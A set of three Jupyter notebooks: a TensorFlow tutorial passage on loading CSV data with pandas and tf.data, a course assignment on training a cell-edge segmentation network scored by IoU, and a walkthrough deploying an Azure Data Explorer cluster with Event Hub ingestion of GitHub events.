There are two main parts to this:
1. **Loading the data off disk**
2. **Pre-processing it into a form suitable for training.**
This tutorial focuses on the loading, and gives some quick examples of preprocessing. For a tutorial that focuses on the preprocessing aspect see the [preprocessing layers guide](https://www.tensorflow.org/guide/keras/preprocessing_layers#quick_recipes) and [tutorial](../tutorials/structured_data/preprocessing_layers.ipynb).
## Setup
```
import pandas as pd
import numpy as np
# Make numpy values easier to read.
np.set_printoptions(precision=3, suppress=True)
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow.keras.layers.experimental import preprocessing
```
## In memory data
For any small CSV dataset the simplest way to train a TensorFlow model on it is to load it into memory as a pandas Dataframe or a NumPy array.
A relatively simple example is the [abalone dataset](https://archive.ics.uci.edu/ml/datasets/abalone).
* The dataset is small.
* All the input features are all limited-range floating point values.
Here is how to download the data into a [Pandas `DataFrame`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html):
```
abalone_train = pd.read_csv(
"https://storage.googleapis.com/download.tensorflow.org/data/abalone_train.csv", header=None,
names=["Length", "Diameter", "Height", "Whole weight", "Shucked weight",
"Viscera weight", "Shell weight", "Age"])
abalone_train.head()
```
The dataset contains a set of measurements of [abalone](https://en.wikipedia.org/wiki/Abalone), a type of sea snail.

[“Abalone shell”](https://www.flickr.com/photos/thenickster/16641048623/) (by [Nicki Dugan Pogue](https://www.flickr.com/photos/thenickster/), CC BY-SA 2.0)
The nominal task for this dataset is to predict the age from the other measurements, so separate the features and labels for training:
```
abalone_features = abalone_train.copy()
abalone_labels = abalone_features.pop('Age')
```
For this dataset you will treat all features identically. Pack the features into a single NumPy array:
```
abalone_features = np.array(abalone_features)
abalone_features
```
Next make a regression model predict the age. Since there is only a single input tensor, a `keras.Sequential` model is sufficient here.
```
abalone_model = tf.keras.Sequential([
layers.Dense(64),
layers.Dense(1)
])
abalone_model.compile(loss = tf.losses.MeanSquaredError(),
optimizer = tf.optimizers.Adam())
```
To train that model, pass the features and labels to `Model.fit`:
```
abalone_model.fit(abalone_features, abalone_labels, epochs=10)
```
You have just seen the most basic way to train a model using CSV data. Next, you will learn how to apply preprocessing to normalize numeric columns.
## Basic preprocessing
It's good practice to normalize the inputs to your model. The `experimental.preprocessing` layers provide a convenient way to build this normalization into your model.
The layer will precompute the mean and variance of each column, and use these to normalize the data.
First you create the layer:
```
normalize = preprocessing.Normalization()
```
Then you use the `Normalization.adapt()` method to adapt the normalization layer to your data.
Note: Only use your training data to `.adapt()` preprocessing layers. Do not use your validation or test data.
```
normalize.adapt(abalone_features)
```
Then use the normalization layer in your model:
```
norm_abalone_model = tf.keras.Sequential([
normalize,
layers.Dense(64),
layers.Dense(1)
])
norm_abalone_model.compile(loss = tf.losses.MeanSquaredError(),
optimizer = tf.optimizers.Adam())
norm_abalone_model.fit(abalone_features, abalone_labels, epochs=10)
```
## Mixed data types
The "Titanic" dataset contains information about the passengers on the Titanic. The nominal task on this dataset is to predict who survived.

Image [from Wikimedia](https://commons.wikimedia.org/wiki/File:RMS_Titanic_3.jpg)
The raw data can easily be loaded as a Pandas `DataFrame`, but is not immediately usable as input to a TensorFlow model.
```
titanic = pd.read_csv("https://storage.googleapis.com/tf-datasets/titanic/train.csv")
titanic.head()
titanic_features = titanic.copy()
titanic_labels = titanic_features.pop('survived')
```
Because of the different data types and ranges you can't simply stack the features into NumPy array and pass it to a `keras.Sequential` model. Each column needs to be handled individually.
As one option, you could preprocess your data offline (using any tool you like) to convert categorical columns to numeric columns, then pass the processed output to your TensorFlow model. The disadvantage to that approach is that if you save and export your model the preprocessing is not saved with it. The `experimental.preprocessing` layers avoid this problem because they're part of the model.
In this example, you'll build a model that implements the preprocessing logic using [Keras functional API](https://www.tensorflow.org/guide/keras/functional.ipynb). You could also do it by [subclassing](https://www.tensorflow.org/guide/keras/custom_layers_and_models).
The functional API operates on "symbolic" tensors. Normal "eager" tensors have a value. In contrast these "symbolic" tensors do not. Instead they keep track of which operations are run on them, and build representation of the calculation, that you can run later. Here's a quick example:
```
# Create a symbolic input
input = tf.keras.Input(shape=(), dtype=tf.float32)
# Do a calculation using it
result = 2*input + 1
# the result doesn't have a value
result
calc = tf.keras.Model(inputs=input, outputs=result)
print(calc(1).numpy())
print(calc(2).numpy())
```
To build the preprocessing model, start by building a set of symbolic `keras.Input` objects, matching the names and data-types of the CSV columns.
```
inputs = {}
for name, column in titanic_features.items():
dtype = column.dtype
if dtype == object:
dtype = tf.string
else:
dtype = tf.float32
inputs[name] = tf.keras.Input(shape=(1,), name=name, dtype=dtype)
inputs
```
The first step in your preprocessing logic is to concatenate the numeric inputs together, and run them through a normalization layer:
```
numeric_inputs = {name:input for name,input in inputs.items()
if input.dtype==tf.float32}
x = layers.Concatenate()(list(numeric_inputs.values()))
norm = preprocessing.Normalization()
norm.adapt(np.array(titanic[numeric_inputs.keys()]))
all_numeric_inputs = norm(x)
all_numeric_inputs
```
Collect all the symbolic preprocessing results, to concatenate them later.
```
preprocessed_inputs = [all_numeric_inputs]
```
For the string inputs use the `preprocessing.StringLookup` function to map from strings to integer indices in a vocabulary. Next, use `preprocessing.CategoryEncoding` to convert the indexes into `float32` data appropriate for the model.
The default settings for the `CategoryEncoding` layer create a one-hot vector for each input. A `layers.Embedding` would also work. See the [preprocessing layers guide](https://www.tensorflow.org/guide/keras/preprocessing_layers#quick_recipes) and [tutorial](../tutorials/structured_data/preprocessing_layers.ipynb) for more on this topic.
```
for name, input in inputs.items():
if input.dtype == tf.float32:
continue
lookup = preprocessing.StringLookup(vocabulary=np.unique(titanic_features[name]))
one_hot = preprocessing.CategoryEncoding(max_tokens=lookup.vocab_size())
x = lookup(input)
x = one_hot(x)
preprocessed_inputs.append(x)
```
With the collection of `inputs` and `processed_inputs`, you can concatenate all the preprocessed inputs together, and build a model that handles the preprocessing:
```
preprocessed_inputs_cat = layers.Concatenate()(preprocessed_inputs)
titanic_preprocessing = tf.keras.Model(inputs, preprocessed_inputs_cat)
tf.keras.utils.plot_model(model = titanic_preprocessing , rankdir="LR", dpi=72, show_shapes=True)
```
This `model` just contains the input preprocessing. You can run it to see what it does to your data. Keras models don't automatically convert Pandas `DataFrames` because it's not clear if it should be converted to one tensor or to a dictionary of tensors. So convert it to a dictionary of tensors:
```
titanic_features_dict = {name: np.array(value)
for name, value in titanic_features.items()}
```
Slice out the first training example and pass it to this preprocessing model, you see the numeric features and string one-hots all concatenated together:
```
features_dict = {name:values[:1] for name, values in titanic_features_dict.items()}
titanic_preprocessing(features_dict)
```
Now build the model on top of this:
```
def titanic_model(preprocessing_head, inputs):
    """Build and compile a classifier that runs `preprocessing_head` first.

    The preprocessing model's output feeds a small dense body ending in a
    single logit, so the binary cross-entropy loss uses from_logits=True.
    """
    dense_body = tf.keras.Sequential([
        layers.Dense(64),
        layers.Dense(1),
    ])
    logits = dense_body(preprocessing_head(inputs))
    model = tf.keras.Model(inputs, logits)
    model.compile(
        loss=tf.losses.BinaryCrossentropy(from_logits=True),
        optimizer=tf.optimizers.Adam(),
    )
    return model
titanic_model = titanic_model(titanic_preprocessing, inputs)
```
When you train the model, pass the dictionary of features as `x`, and the label as `y`.
```
titanic_model.fit(x=titanic_features_dict, y=titanic_labels, epochs=10)
```
Since the preprocessing is part of the model, you can save the model and reload it somewhere else and get identical results:
```
titanic_model.save('test')
reloaded = tf.keras.models.load_model('test')
features_dict = {name:values[:1] for name, values in titanic_features_dict.items()}
before = titanic_model(features_dict)
after = reloaded(features_dict)
assert (before-after)<1e-3
print(before)
print(after)
```
## Using tf.data
In the previous section you relied on the model's built-in data shuffling and batching while training the model.
If you need more control over the input data pipeline or need to use data that doesn't easily fit into memory: use `tf.data`.
For more examples see the [tf.data guide](../../guide/data.ipynb).
### On in memory data
As a first example of applying `tf.data` to CSV data consider the following code to manually slice up the dictionary of features from the previous section. For each index, it takes that index for each feature:
```
import itertools
def slices(features):
    """Yield one example at a time from a dict of parallel feature arrays.

    Each yielded dict maps feature name -> that feature's value at the
    current index. Iteration ends when indexing past the shortest array
    raises, and that exception propagates to the caller (as the original
    itertools.count-based loop did).
    """
    index = 0
    while True:
        yield {name: values[index] for name, values in features.items()}
        index += 1
```
Run this and print the first example:
```
for example in slices(titanic_features_dict):
for name, value in example.items():
print(f"{name:19s}: {value}")
break
```
The most basic `tf.data.Dataset` in memory data loader is the `Dataset.from_tensor_slices` constructor. This returns a `tf.data.Dataset` that implements a generalized version of the above `slices` function, in TensorFlow.
```
features_ds = tf.data.Dataset.from_tensor_slices(titanic_features_dict)
```
You can iterate over a `tf.data.Dataset` like any other python iterable:
```
for example in features_ds:
for name, value in example.items():
print(f"{name:19s}: {value}")
break
```
The `from_tensor_slices` function can handle any structure of nested dictionaries or tuples. The following code makes a dataset of `(features_dict, labels)` pairs:
```
titanic_ds = tf.data.Dataset.from_tensor_slices((titanic_features_dict, titanic_labels))
```
To train a model using this `Dataset`, you'll need to at least `shuffle` and `batch` the data.
```
titanic_batches = titanic_ds.shuffle(len(titanic_labels)).batch(32)
```
Instead of passing `features` and `labels` to `Model.fit`, you pass the dataset:
```
titanic_model.fit(titanic_batches, epochs=5)
```
### From a single file
So far this tutorial has worked with in-memory data. `tf.data` is a highly scalable toolkit for building data pipelines, and provides a few functions for loading CSV files.
```
titanic_file_path = tf.keras.utils.get_file("train.csv", "https://storage.googleapis.com/tf-datasets/titanic/train.csv")
```
Now read the CSV data from the file and create a `tf.data.Dataset`.
(For the full documentation, see `tf.data.experimental.make_csv_dataset`)
```
titanic_csv_ds = tf.data.experimental.make_csv_dataset(
titanic_file_path,
batch_size=5, # Artificially small to make examples easier to show.
label_name='survived',
num_epochs=1,
ignore_errors=True,)
```
This function includes many convenient features so the data is easy to work with. This includes:
* Using the column headers as dictionary keys.
* Automatically determining the type of each column.
```
for batch, label in titanic_csv_ds.take(1):
for key, value in batch.items():
print(f"{key:20s}: {value}")
print()
print(f"{'label':20s}: {label}")
```
Note: if you run the above cell twice it will produce different results. The default settings for `make_csv_dataset` include `shuffle_buffer_size=1000`, which is more than sufficient for this small dataset, but may not be for a real-world dataset.
It can also decompress the data on the fly. Here's a gzipped CSV file containing the [metro interstate traffic dataset](https://archive.ics.uci.edu/ml/datasets/Metro+Interstate+Traffic+Volume)

Image [from Wikimedia](https://commons.wikimedia.org/wiki/File:Trafficjam.jpg)
```
traffic_volume_csv_gz = tf.keras.utils.get_file(
'Metro_Interstate_Traffic_Volume.csv.gz',
"https://archive.ics.uci.edu/ml/machine-learning-databases/00492/Metro_Interstate_Traffic_Volume.csv.gz",
cache_dir='.', cache_subdir='traffic')
```
Set the `compression_type` argument to read directly from the compressed file:
```
traffic_volume_csv_gz_ds = tf.data.experimental.make_csv_dataset(
traffic_volume_csv_gz,
batch_size=256,
label_name='traffic_volume',
num_epochs=1,
compression_type="GZIP")
for batch, label in traffic_volume_csv_gz_ds.take(1):
for key, value in batch.items():
print(f"{key:20s}: {value[:5]}")
print()
print(f"{'label':20s}: {label[:5]}")
```
Note: If you need to parse those date-time strings in the `tf.data` pipeline you can use `tfa.text.parse_time`.
### Caching
There is some overhead to parsing the csv data. For small models this can be the bottleneck in training.
Depending on your use case it may be a good idea to use `Dataset.cache` or `data.experimental.snapshot` so that the csv data is only parsed on the first epoch.
The main difference between the `cache` and `snapshot` methods is that `cache` files can only be used by the TensorFlow process that created them, but `snapshot` files can be read by other processes.
For example, iterating over the `traffic_volume_csv_gz_ds` 20 times, takes ~15 seconds without caching, or ~2s with caching.
```
%%time
for i, (batch, label) in enumerate(traffic_volume_csv_gz_ds.repeat(20)):
if i % 40 == 0:
print('.', end='')
print()
```
Note: `Dataset.cache` stores the data from the first epoch and replays it in order. So using `.cache` disables any shuffles earlier in the pipeline. Below the `.shuffle` is added back in after `.cache`.
```
%%time
caching = traffic_volume_csv_gz_ds.cache().shuffle(1000)
for i, (batch, label) in enumerate(caching.shuffle(1000).repeat(20)):
if i % 40 == 0:
print('.', end='')
print()
```
Note: `snapshot` files are meant for *temporary* storage of a dataset while in use. This is *not* a format for long term storage. The file format is considered an internal detail, and not guaranteed between TensorFlow versions.
```
%%time
snapshot = tf.data.experimental.snapshot('titanic.tfsnap')
snapshotting = traffic_volume_csv_gz_ds.apply(snapshot).shuffle(1000)
for i, (batch, label) in enumerate(snapshotting.shuffle(1000).repeat(20)):
if i % 40 == 0:
print('.', end='')
print()
```
If your data loading is slowed by loading csv files, and `cache` and `snapshot` are insufficient for your use case, consider re-encoding your data into a more streamlined format.
### Multiple files
All the examples so far in this section could easily be done without `tf.data`. One place where `tf.data` can really simplify things is when dealing with collections of files.
For example, the [character font images](https://archive.ics.uci.edu/ml/datasets/Character+Font+Images) dataset is distributed as a collection of csv files, one per font.

Image by <a href="https://pixabay.com/users/wilhei-883152/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=705667">Willi Heidelbach</a> from <a href="https://pixabay.com/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=705667">Pixabay</a>
Download the dataset, and have a look at the files inside:
```
fonts_zip = tf.keras.utils.get_file(
'fonts.zip', "https://archive.ics.uci.edu/ml/machine-learning-databases/00417/fonts.zip",
cache_dir='.', cache_subdir='fonts',
extract=True)
import pathlib
font_csvs = sorted(str(p) for p in pathlib.Path('fonts').glob("*.csv"))
font_csvs[:10]
len(font_csvs)
```
When dealing with a bunch of files you can pass a glob-style `file_pattern` to the `experimental.make_csv_dataset` function. The order of the files is shuffled each iteration.
Use the `num_parallel_reads` argument to set how many files are read in parallel and interleaved together.
```
fonts_ds = tf.data.experimental.make_csv_dataset(
file_pattern = "fonts/*.csv",
batch_size=10, num_epochs=1,
num_parallel_reads=20,
shuffle_buffer_size=10000)
```
These csv files have the images flattened out into a single row. The column names are formatted `r{row}c{column}`. Here's the first batch:
```
for features in fonts_ds.take(1):
for i, (name, value) in enumerate(features.items()):
if i>15:
break
print(f"{name:20s}: {value}")
print('...')
print(f"[total: {len(features)} features]")
```
#### Optional: Packing fields
You probably don't want to work with each pixel in separate columns like this. Before trying to use this dataset be sure to pack the pixels into an image-tensor.
Here is code that parses the column names to build images for each example:
```
import re
def make_images(features):
    """Repack per-pixel columns named r{row}c{col} into one image tensor.

    Pixel columns are gathered into a [20, 20, batch] tensor stored under
    the 'image' key; every non-pixel column is passed through unchanged.
    """
    pixels = [None] * 400  # 20 x 20 grid, flattened row-major
    new_feats = {}
    for name, value in features.items():
        # Raw string: '\d' in a plain literal is an invalid escape
        # sequence (SyntaxWarning on modern Python).
        match = re.match(r'r(\d+)c(\d+)', name)
        if match:
            row, col = int(match.group(1)), int(match.group(2))
            pixels[row * 20 + col] = value
        else:
            new_feats[name] = value
    image = tf.stack(pixels, axis=0)
    image = tf.reshape(image, [20, 20, -1])
    new_feats['image'] = image
    return new_feats
```
Apply that function to each batch in the dataset:
```
fonts_image_ds = fonts_ds.map(make_images)
for features in fonts_image_ds.take(1):
break
```
Plot the resulting images:
```
from matplotlib import pyplot as plt
plt.figure(figsize=(6,6), dpi=120)
for n in range(9):
plt.subplot(3,3,n+1)
plt.imshow(features['image'][..., n])
plt.title(chr(features['m_label'][n]))
plt.axis('off')
```
## Lower level functions
So far this tutorial has focused on the highest level utilities for reading csv data. There are two other APIs that may be helpful for advanced users if your use-case doesn't fit the basic patterns.
* `tf.io.decode_csv` - a function for parsing lines of text into a list of CSV column tensors.
* `tf.data.experimental.CsvDataset` - a lower level csv dataset constructor.
This section recreates functionality provided by `make_csv_dataset`, to demonstrate how this lower level functionality can be used.
### `tf.io.decode_csv`
This function decodes a string, or list of strings into a list of columns.
Unlike `make_csv_dataset` this function does not try to guess column data-types. You specify the column types by providing a list of `record_defaults` containing a value of the correct type, for each column.
To read the Titanic data **as strings** using `decode_csv` you would say:
```
text = pathlib.Path(titanic_file_path).read_text()
lines = text.split('\n')[1:-1]
all_strings = [str()]*10
all_strings
features = tf.io.decode_csv(lines, record_defaults=all_strings)
for f in features:
print(f"type: {f.dtype.name}, shape: {f.shape}")
```
To parse them with their actual types, create a list of `record_defaults` of the corresponding types:
```
print(lines[0])
titanic_types = [int(), str(), float(), int(), int(), float(), str(), str(), str(), str()]
titanic_types
features = tf.io.decode_csv(lines, record_defaults=titanic_types)
for f in features:
print(f"type: {f.dtype.name}, shape: {f.shape}")
```
Note: it is more efficient to call `decode_csv` on large batches of lines than on individual lines of csv text.
### `tf.data.experimental.CsvDataset`
The `tf.data.experimental.CsvDataset` class provides a minimal CSV `Dataset` interface without the convenience features of the `make_csv_dataset` function: column header parsing, column type-inference, automatic shuffling, file interleaving.
This constructor uses `record_defaults` the same way as `io.decode_csv`:
```
simple_titanic = tf.data.experimental.CsvDataset(titanic_file_path, record_defaults=titanic_types, header=True)
for example in simple_titanic.take(1):
print([e.numpy() for e in example])
```
The above code is basically equivalent to:
```
def decode_titanic_line(line):
    """Parse one CSV text line into typed column tensors.

    Column types come from the module-level `titanic_types` defaults.
    """
    return tf.io.decode_csv(line, titanic_types)
manual_titanic = (
# Load the lines of text
tf.data.TextLineDataset(titanic_file_path)
# Skip the header row.
.skip(1)
# Decode the line.
.map(decode_titanic_line)
)
for example in manual_titanic.take(1):
print([e.numpy() for e in example])
```
#### Multiple files
To parse the fonts dataset using `experimental.CsvDataset`, you first need to determine the column types for the `record_defaults`. Start by inspecting the first row of one file:
```
font_line = pathlib.Path(font_csvs[0]).read_text().splitlines()[1]
print(font_line)
```
Only the first two fields are strings, the rest are ints or floats, and you can get the total number of features by counting the commas:
```
num_font_features = font_line.count(',')+1
font_column_types = [str(), str()] + [float()]*(num_font_features-2)
```
The `CsvDataset` constructor can take a list of input files, but reads them sequentially. The first file in the list of CSVs is `AGENCY.csv`:
```
font_csvs[0]
```
So when you pass the list of files to `CsvDataset` the records from `AGENCY.csv` are read first:
```
simple_font_ds = tf.data.experimental.CsvDataset(
font_csvs,
record_defaults=font_column_types,
header=True)
for row in simple_font_ds.take(10):
print(row[0].numpy())
```
To interleave multiple files, use `Dataset.interleave`.
Here's an initial dataset that contains the csv file names:
```
font_files = tf.data.Dataset.list_files("fonts/*.csv")
```
This shuffles the file names each epoch:
```
print('Epoch 1:')
for f in list(font_files)[:5]:
print(" ", f.numpy())
print(' ...')
print()
print('Epoch 2:')
for f in list(font_files)[:5]:
print(" ", f.numpy())
print(' ...')
```
The `interleave` method takes a `map_func` that creates a child-`Dataset` for each element of the parent-`Dataset`.
Here, you want to create a `CsvDataset` from each element of the dataset of files:
```
def make_font_csv_ds(path):
    # Build a CsvDataset for one font CSV file.  font_column_types (two
    # strings followed by floats, built earlier) supplies record_defaults,
    # and header=True skips the column-name row.
    return tf.data.experimental.CsvDataset(
        path,
        record_defaults=font_column_types,
        header=True)
```
The `interleave` method returns a `Dataset` whose elements are produced by cycling over a number of the child-`Dataset`s. Note, below, how the dataset cycles over `cycle_length=3` font files:
```
font_rows = font_files.interleave(make_font_csv_ds,
cycle_length=3)
fonts_dict = {'font_name':[], 'character':[]}
for row in font_rows.take(10):
fonts_dict['font_name'].append(row[0].numpy().decode())
fonts_dict['character'].append(chr(row[2].numpy()))
pd.DataFrame(fonts_dict)
```
#### Performance
Earlier, it was noted that `io.decode_csv` is more efficient when run on a batch of strings.
It is possible to take advantage of this fact, when using large batch sizes, to improve CSV loading performance (but try [caching](#caching) first).
With the built-in loader 20, 2048-example batches take about 17s.
```
BATCH_SIZE=2048
fonts_ds = tf.data.experimental.make_csv_dataset(
file_pattern = "fonts/*.csv",
batch_size=BATCH_SIZE, num_epochs=1,
num_parallel_reads=100)
%%time
for i,batch in enumerate(fonts_ds.take(20)):
print('.',end='')
print()
```
Passing **batches of text lines** to `decode_csv` runs faster, in about 5s:
```
fonts_files = tf.data.Dataset.list_files("fonts/*.csv")
fonts_lines = fonts_files.interleave(
lambda fname:tf.data.TextLineDataset(fname).skip(1),
cycle_length=100).batch(BATCH_SIZE)
fonts_fast = fonts_lines.map(lambda x: tf.io.decode_csv(x, record_defaults=font_column_types))
%%time
for i,batch in enumerate(fonts_fast.take(20)):
print('.',end='')
print()
```
For another example of increasing csv performance by using large batches see the [overfit and underfit tutorial](../keras/overfit_and_underfit.ipynb).
This sort of approach may work, but consider other options like `cache` and `snapshot`, or re-encoding your data into a more streamlined format.
| github_jupyter |
## Neural networks for segmentation
```
! wget https://www.dropbox.com/s/jy34yowcf85ydba/data.zip?dl=0 -O data.zip
! unzip -q data.zip
```
Your next task is to train neural network to segment cells edges.
Here is an example of input data with corresponding ground truth:
```
import scipy as sp
import scipy.misc
import matplotlib.pyplot as plt
import numpy as np
import skimage.io
import skimage
%matplotlib inline
# Human HT29 colon-cancer cells
plt.figure(figsize=(10,8))
plt.subplot(1,2,1)
im = skimage.img_as_ubyte(skimage.io.imread('BBBC018_v1_images-fixed/train/00735-actin.DIB.bmp'))
plt.imshow(im)
plt.subplot(1,2,2)
mask = skimage.img_as_ubyte(skimage.io.imread('BBBC018_v1_outlines/train/00735-cells.png'))
plt.imshow(mask, 'gray')
```
This time you aren't provided with any code snippets, just input data and target metric - intersection-over-union (IoU) (see implementation below).
You should train neural network to predict mask of edge pixels (pixels in gt images with value greater than 0).
Use everything you've learnt by now:
* any architectures for semantic segmentation (encoder-decoder like or based on dilated convolutions)
* data augmentation (you will need that since train set consists of just 41 images)
* fine-tuning
You're not allowed to do only one thing: to train your network on the test set.
Your final solution will consist of an ipython notebook with code (for final network training + any experiments with data) and an archive with png images with network predictions for test images (one-channel images, 0 - for non-edge pixels, any non-zero value for edge pixels).
Forestalling questions about baseline... well, let's say that a good network should be able to segment images with iou >= 0.29. This is not a strict criterion of full points solution, but try to obtain better numbers.
Practical notes:
* There is a hard data class imbalance in dataset, so the network output will be biased toward "zero" class. You can either tune the minimal probability threshold for "edge" class, or add class weights to increase the cost of edge pixels in optimized loss.
* Dataset is small so actively use data augmentation: rotations, flip, random contrast and brightness
* Better spend time on experiments with neural network than on postprocessing tricks (i.e test set augmentation).
* Keep in mind that the network architecture defines the receptive field of each output pixel. If the size of the network input is smaller than the receptive field of an output pixel, then you can probably drop some layers without loss of quality. It is OK to modify off-the-shelf architectures.
Good luck!
```
def calc_iou(prediction, ground_truth):
    """Compute the dataset-level intersection-over-union (IoU) score.

    Pixels with value > 0 are treated as positive ("edge") in both the
    predictions and the ground truth.  Intersection and union are summed
    over all images *before* dividing, so larger images carry more weight
    than smaller ones.

    Parameters
    ----------
    prediction : sequence of ndarray
        Predicted masks; any value > 0 counts as an edge pixel.
    ground_truth : sequence of ndarray
        Ground-truth masks, same length and per-image shapes as `prediction`.

    Returns
    -------
    float
        intersection / union over the whole dataset; 0.0 when the union is
        empty (all masks entirely negative), instead of raising
        ZeroDivisionError as the unguarded division would.
    """
    n_images = len(prediction)
    intersection, union = 0, 0
    for i in range(n_images):
        intersection += np.logical_and(prediction[i] > 0, ground_truth[i] > 0).astype(np.float32).sum()
        union += np.logical_or(prediction[i] > 0, ground_truth[i] > 0).astype(np.float32).sum()
    # Guard against completely empty masks on both sides.
    if union == 0:
        return 0.0
    return float(intersection) / union
```
| github_jupyter |
## 1. Get and Set Azure Credentials
```
!az login
!az ad sp create-for-rbac --sdk-auth > mycredentials.json
import os, json
with open('mycredentials.json') as data_file:
azure_session = json.load(data_file)
# delete credentials file
os.remove("mycredentials.json")
```
## 2. Create Azure Resource Manager Client
```
from azure.common.credentials import ServicePrincipalCredentials
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.resource.resources.models import DeploymentMode
credentials = ServicePrincipalCredentials(
client_id=azure_session["clientId"],
secret=azure_session["clientSecret"],
tenant=azure_session["tenantId"]
)
client = ResourceManagementClient(credentials, azure_session["subscriptionId"])
```
## 3. Resource Group Parameters
```
RESOURCE_GROUP_NAME = 'kustodeploymenttest' # Set resource group name here
AZURE_REGION = 'East US' # Set region here
location = ''.join(AZURE_REGION.split()).lower()
```
## 4. Azure Data Explorer Cluster Parameters
```
CLUSTER_NAME = 'cdacluster'
CLUSTER_NODE_SIZE = 'D13_v2'
CLUSTER_NODE_TEIR = 'Standard'
CLUSTER_NODE_CAPACITY = 2
```
## 5. Set Azure Data Explorer DB Deployment Parameters
```
DB_NAME = 'cdadb'
DB_SOFT_DELETION_PERIOD = 3650
DB_HOT_CACHE_PERIOD = 31
URI = "https://{}.{}.kusto.windows.net:443".format(CLUSTER_NAME, location)
DATA_INGESTION_URI = "https://ingest-{}.{}.kusto.windows.net:443/".format(CLUSTER_NAME, location)
```
## 6. Define Azure Data Explorer Deployment Template
```
template = {\
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [\
{\
"type": "Microsoft.Kusto/Clusters",
"sku": {\
"name": CLUSTER_NODE_SIZE,
"tier": CLUSTER_NODE_TEIR,
"capacity": CLUSTER_NODE_CAPACITY
},
"name": CLUSTER_NAME,
"apiVersion": "2017-09-07-privatepreview",
"location": AZURE_REGION,
"properties": {\
"trustedExternalTenants": [
{
"value": azure_session["tenantId"]
}
],
}
},
{\
"type": "Microsoft.Kusto/Clusters/Databases",
"name": "{}/{}".format(CLUSTER_NAME, DB_NAME),
"apiVersion": "2017-09-07-privatepreview",
"location": AZURE_REGION,
"properties": {
"softDeletePeriodInDays": DB_SOFT_DELETION_PERIOD,
"hotCachePeriodInDays": DB_HOT_CACHE_PERIOD,
},
"dependsOn": [\
"[resourceId('Microsoft.Kusto/Clusters', '{}')]".format(CLUSTER_NAME)
]
}
]
}
deployment_properties = {
'mode': DeploymentMode.incremental,
'template': template,
}
```
## 7. Create Resource Group and Deploy
Note this could take 10-15 min and is not necessary if you've run the last notebook
```
resource_group_params = {'location':location}
client.resource_groups.create_or_update('kustodeploymenttest', resource_group_params)
# https://docs.microsoft.com/en-us/python/api/azure-mgmt-resource/azure.mgmt.resource.resources.v2018_05_01.operations.deploymentsoperations?view=azure-python#create-or-update
deployment_async_operation = client.deployments.create_or_update(
RESOURCE_GROUP_NAME,
'azure-sample',
deployment_properties
)
deployment_async_operation.wait()
```
## 8. Install Kusto Ingestion Libraries for Stream Ingestion
```
# Install Prerequisite Libraries
!pip install azure-kusto-data==0.0.13
!pip install azure-kusto-ingest==0.0.13
```
## 9. Create Kusto Client
```
from azure.kusto.data.request import KustoClient, KustoConnectionStringBuilder
from azure.kusto.data.exceptions import KustoServiceError
from azure.kusto.data.helpers import dataframe_from_result_table
import pandas as pd
import datetime
KCSB_ENGINE = KustoConnectionStringBuilder.with_aad_application_key_authentication(URI,
azure_session["clientId"],
azure_session["clientSecret"],
azure_session["tenantId"])
KUSTO_CLIENT = KustoClient(KCSB_ENGINE)
```
## 10. Create a Table Called Github Event to hold our data
```
CREATE_TABLE_COMMAND = ".create table GithubEvent ( Id:int64, Type: string, Actor: dynamic, Repo: dynamic, Payload: dynamic, Public:bool, CreatedAt: datetime)"
RESPONSE = KUSTO_CLIENT.execute_mgmt(DB_NAME, CREATE_TABLE_COMMAND)
dataframe_from_result_table(RESPONSE.primary_results[0])
```
## 11. Create an Ingestion Mapping for Ingesting Events from EventHub
```
CREATE_MAPPING_COMMAND = """.create table GithubEvent ingestion json mapping "GitMapping" '[{"column":"Id","path":"$.id"},{"column":"Type","path":"$.type"},{"column":"Actor","path":"$.actor"},{"column":"Repo","path":"$.repo"},{"column":"Payload","path":"$.payload"},{"column":"Public","path":"$.public"},{"column":"CreatedAt","path":"$.created_at"}]'"""
RESPONSE = KUSTO_CLIENT.execute_mgmt(DB_NAME, CREATE_MAPPING_COMMAND)
dataframe_from_result_table(RESPONSE.primary_results[0])
```
## 11. Create Event Hub using the Azure CLI to Ingest All Github Events
```
# Create an Event Hubs namespace. Specify a name for the Event Hubs namespace.
!az eventhubs namespace create --name 'kusto-github-EHNS' --resource-group 'kustodeploymenttest' -l 'East US'
# Create an event hub. Specify a name for the event hub.
!az eventhubs eventhub create --name 'kusto-github-EH' --resource-group 'kustodeploymenttest' --namespace-name 'kusto-github-EHNS'
```
### Create a EH User and Key for Github Ingestion
```
!az eventhubs eventhub authorization-rule create --eventhub-name 'kusto-github-EH'\
--name 'kusto-github-EH-key'\
--namespace-name 'kusto-github-EHNS'\
--resource-group 'kustodeploymenttest'\
--rights 'Send'
```
## 12. Use ARM to link the new EventHub with our Cluster
```
template = { \
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
{
"type":"Microsoft.Kusto/clusters/databases/eventhubconnections",
"name":"{}/{}/{}".format(CLUSTER_NAME, DB_NAME, 'github'),
"apiVersion":"2018-09-07-preview",
"location": AZURE_REGION,
"properties":{
"consumerGroup":"$Default",
"eventHubResourceId":"[resourceId('Microsoft.EventHub/namespaces/eventhubs', 'kusto-github-EHNS', 'kusto-github-EH')]",
"tableName":"GithubEvent",
"mappingRuleName":"GitMapping",
"dataFormat":"JSON"
}
}
]
}
deployment_properties = {
'mode': DeploymentMode.incremental,
'template': template,
}
# https://docs.microsoft.com/en-us/python/api/azure-mgmt-resource/azure.mgmt.resource.resources.v2018_05_01.operations.deploymentsoperations?view=azure-python#create-or-update
deployment_async_operation = client.deployments.create_or_update(
RESOURCE_GROUP_NAME,
'azure-sample',
deployment_properties
)
deployment_async_operation.wait()
```
## 13. Use the Azure CLI to create an container instance to ingest all the github events into our EventHub
You'll need a github developer token you can get one for free from using [these instructions](https://github.blog/2013-05-16-personal-api-tokens/).
### Get EH Key
```
!az eventhubs eventhub authorization-rule keys list --resource-group 'kustodeploymenttest' --namespace-name 'kusto-github-EHNS' --eventhub-name 'kusto-github-EH' --name 'kusto-github-EH-key'
```
### Run CLI Command
